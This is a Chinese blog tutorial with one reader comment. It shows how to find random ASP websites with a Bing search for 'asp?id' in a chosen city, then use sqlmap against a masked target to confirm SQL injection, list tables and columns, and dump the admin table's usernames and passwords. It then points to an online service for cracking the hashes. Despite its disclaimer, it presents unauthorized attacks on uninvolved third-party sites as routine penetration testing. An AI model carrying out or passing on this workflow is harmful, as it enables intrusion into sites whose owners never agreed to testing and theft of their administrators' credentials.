0x05 ASP网站渗透测试

0x05 ASP网站渗透测试

  • 最近更新2018年10月30日

特殊说明:本文档以技术角度出发,勿用于非法用途。

目前市面上主要的WEB开发语言分别为ASP、JSP以及PHP,当然也存在使用Python WEB等其它语言开发的,不管使用什么语言,网站的安全是至关重要的,今天我们以ASP为例,对网站的安全进行渗透测试。

今天所使用的方法是SQL注入,在渗透测试之前,我们需要找到ASP开发的网站,我们可以借助强大的搜索引擎,当然使用搜索引擎也需要技巧,要不会所查找的内容会被广告所干扰。其实最好的搜索引擎为google,但在我们国家是访问不了的,所以我们这里使用必应(“http://cn.bing.com/”)。

我们要查找网站地址中包含asp标识的网站,从而确认网站的开发语言,我们只要在必应搜索引擎中输入“asp?id”即可,我为了更准确找到指定地区的网站,我所使用的是“ “asp?id” and “沈阳” ”,如下图所示:

在搜索到的结果,中就可以看到目标的网站,如下图所示:

接下来我们检测网站是否存在漏洞,我们使用的命令是:

# 检测是否存在SQL注入漏洞(这里将网址替换为XXX)
# -u 参数为后根网站URL
sqlmap -u "http://www.xxx.com/qyzz_more.asp?id=589"

 

在检测结果后,如果出现操作系统及数据库信息时,说明我们找到了合适的目标,如下图所示:

web server operating system: Windows 2008 R2 or 7为操作系统类型。

web application technology: ASP.NET, Microsoft IIS 7.5, ASP为开发语言。

back-end DBMS: Microsoft Access为数据库类型。

通过枚举的方法,来进行数据库名称的检测。

# 枚举数据库名称(这里将网址替换为XXX)
# --tables 标记为数据库名称
sqlmap -u "http://www.xxx.com/qyzz_more.asp?id=589" --tables

 

在图中可以看出,我们已经找到表名,可以在其中选择我们认为有意义的表名称。接下来就是对表中列进行枚举。

# 枚举字段(这里将网址替换为XXX)
sqlmap -u "http://www.xxx.com/qyzz_more.asp?id=589" --columns -T "admin"

 

我们可以在图中看到存在的敏感字段。接下来我们就查看内容吧。

# 查看帐户信息(这里将网址替换为XXX)
sqlmap -u "http://www.xxx.com/qyzz_more.asp?id=589" --dump -C "admin,password,username" -T "admin"

 

在图中可以看出,密码是经过加密的,我们可以到https://www.cmd5.com网站在线破解,如果是弱口令,很快就能破解出来。

分享到 :
8.4.3 加速键
上一篇 2018-10-25
第9章 位图资源的应用
2018-10-25 下一篇
相关推荐

发表回复

登录... 后才能评论

评论(1)

  • 侠客 游客 2018年10月26日 上午9:47

    给讲讲怎么用搜索引擎搜索吧。强烈建议。